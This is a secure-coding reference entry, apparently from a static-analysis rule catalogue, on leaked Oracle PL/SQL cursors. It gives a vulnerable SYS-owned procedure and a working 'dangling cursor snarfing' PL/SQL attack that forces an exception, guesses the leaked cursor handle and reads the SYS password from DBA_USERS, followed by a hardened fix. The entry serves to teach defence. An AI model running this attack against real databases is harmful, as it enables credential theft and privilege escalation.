A database cursor that is not released can potentially be captured by a lower-privileged user and used to access information that user is not authorized to see.
Resource leaks have at least two common causes:
- Error conditions and other exceptional circumstances.
- Confusion over which part of the program is responsible for releasing the resource.
In SQL, cursors carry the privileges of the code that created them, not of the session that later touches them; a cursor opened inside a definer's-rights procedure owned by SYS runs as SYS. If a less privileged user can capture a leaked cursor, it can be used to view records that user could not query directly.
In addition, most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service by depleting the resource pool (in Oracle, exhausting the session's OPEN_CURSORS limit fails every subsequent statement with ORA-01000, "maximum open cursors exceeded").
Example: The PWD_COMPARE procedure is a definer's-rights procedure owned by SYS, so it can be used by code that does not itself have access to sys.dba_users to check a user's password. The IF guard is the only thing stopping a caller from checking the SYS account.
CREATE OR REPLACE PROCEDURE PWD_COMPARE(p_user VARCHAR, p_pwd VARCHAR)
AUTHID DEFINER          -- runs with the owner's (SYS) privileges
IS
  cur INTEGER;          -- DBMS_SQL cursor handle
  ...
BEGIN
  IF p_user != 'SYS' THEN
    cur := DBMS_SQL.OPEN_CURSOR;
    -- The statement is parsed with SYS privileges; the guard above lives only in PL/SQL
    DBMS_SQL.PARSE(cur, 'SELECT password FROM SYS.DBA_USERS WHERE username = :u', DBMS_SQL.NATIVE);
    DBMS_SQL.BIND_VARIABLE(cur, ':u', p_user);
    ...
    -- No EXCEPTION handler: if anything below raises, cur is never closed
  END IF;
END PWD_COMPARE;
If an attacker can cause an exception during the execution of the procedure after the cursor has been opened and parsed, the cursor leaks and the attacker can then use it to read the sys password. One way to cause an exception is to pass an overly long argument to p_user. Once the attacker knows that the cursor has leaked, they just have to guess the cursor handle and assign new bind variables: the SQL text was already parsed with SYS privileges, so rebinding :u to 'SYS' sidesteps the IF p_user != 'SYS' check entirely. David Litchfield describes this technique as "dangling cursor snarfing" [4].
DECLARE
  x   VARCHAR2(32000);
  r   INTEGER;
  pwd VARCHAR2(30);
BEGIN
  -- Build an overly long username so that PWD_COMPARE raises after it has
  -- opened and parsed its cursor but before it would have closed it
  FOR i IN 1..10000 LOOP
    x := 'b' || x;
  END LOOP;
  SYS.PWD_COMPARE(x, 'pwd');
EXCEPTION
  WHEN OTHERS THEN
    -- The cursor has leaked. Guess its handle, rebind :u to 'SYS' (the guard in
    -- PWD_COMPARE no longer applies) and read the row with SYS privileges
    FOR j IN 1..10000 LOOP
      BEGIN
        DBMS_SQL.BIND_VARIABLE(j, ':u', 'SYS');
        DBMS_SQL.DEFINE_COLUMN(j, 1, pwd, 30);
        r := DBMS_SQL.EXECUTE(j);
        IF DBMS_SQL.FETCH_ROWS(j) > 0 THEN
          DBMS_SQL.COLUMN_VALUE(j, 1, pwd);
          EXIT;
        END IF;
      EXCEPTION
        WHEN OTHERS THEN NULL;  -- j is not an open cursor; try the next handle
      END;
    END LOOP;
    ...
END;
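The fix is to release the cursor on every path out of the procedure, including the exceptional one. The following is an added example of a hardened PWD_COMPARE; it is not code from the original page. It keeps the same definer's-rights model and the same DBA_USERS query as the vulnerable version, and the length check, the p_match OUT parameter and the plain string comparison against p_pwd are illustrative assumptions, not part of the original.

```sql
-- Hardened PWD_COMPARE (added example; not the page's original code).
-- Assumptions: owned by SYS, same DBA_USERS query as above; the length
-- bound, the OUT parameter and the comparison are illustrative.
CREATE OR REPLACE PROCEDURE PWD_COMPARE(p_user  IN  VARCHAR2,
                                        p_pwd   IN  VARCHAR2,
                                        p_match OUT BOOLEAN)
AUTHID DEFINER
IS
  cur    INTEGER := NULL;   -- DBMS_SQL handle; stays NULL if OPEN_CURSOR never ran
  stored VARCHAR2(30);
  rows   INTEGER;
BEGIN
  p_match := FALSE;

  -- Validate input before any privileged resource is acquired. An oversized
  -- argument is one of the ways the original could be made to raise mid-flight.
  IF p_user IS NULL OR LENGTH(p_user) > 30 OR UPPER(p_user) = 'SYS' THEN
    RETURN;
  END IF;

  cur := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(cur,
                 'SELECT password FROM SYS.DBA_USERS WHERE username = :u',
                 DBMS_SQL.NATIVE);
  DBMS_SQL.BIND_VARIABLE(cur, ':u', UPPER(p_user));
  DBMS_SQL.DEFINE_COLUMN(cur, 1, stored, 30);
  rows := DBMS_SQL.EXECUTE(cur);
  IF DBMS_SQL.FETCH_ROWS(cur) > 0 THEN
    DBMS_SQL.COLUMN_VALUE(cur, 1, stored);
    p_match := (stored = p_pwd);   -- illustrative comparison only
  END IF;

  -- Normal path: release the handle.
  DBMS_SQL.CLOSE_CURSOR(cur);
EXCEPTION
  WHEN OTHERS THEN
    -- Failure path: release the handle here too, otherwise it stays open
    -- with SYS privileges for a later caller to snarf. IS_OPEN guards against
    -- closing a handle that was never opened, which would itself raise.
    IF cur IS NOT NULL AND DBMS_SQL.IS_OPEN(cur) THEN
      DBMS_SQL.CLOSE_CURSOR(cur);
    END IF;
    RAISE;
END PWD_COMPARE;
/
```

Two details matter in the handler. The handle is initialised to NULL and checked with DBMS_SQL.IS_OPEN before DBMS_SQL.CLOSE_CURSOR, because closing a cursor that was never opened or is already closed raises inside the handler and would mask the original error. The handler also re-raises rather than swallowing the exception, so callers still see the failure; the goal is to release the resource, not to hide the fault. Since Oracle Database 11g, DBMS_SQL additionally randomises cursor numbers and denies further DBMS_SQL access to a session that presents an invalid cursor number (ORA-29471), which blunts the guessing loop shown above, but releasing the cursor on every path remains the correct fix regardless of version.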
[1] Standards Mapping - OWASP Top 10 2004 - (OWASP 2004) A9 Application Denial of Service
[2] Standards Mapping - Security Technical Implementation Guide Version 3 - (STIG 3) APP6080 CAT II
[3] Standards Mapping - Common Weakness Enumeration - (CWE) CWE ID 404, CWE ID 619
[4] David Litchfield, Dangling Cursor Snarfing: A New Class of Attack in Oracle
[5] Standards Mapping - Payment Card Industry Data Security Standard Version 1.1 - (PCI 1.1) Requirement 6.5.9
[6] Standards Mapping - SANS Top 25 2009 - (SANS 2009) Risky Resource Management - CWE ID 404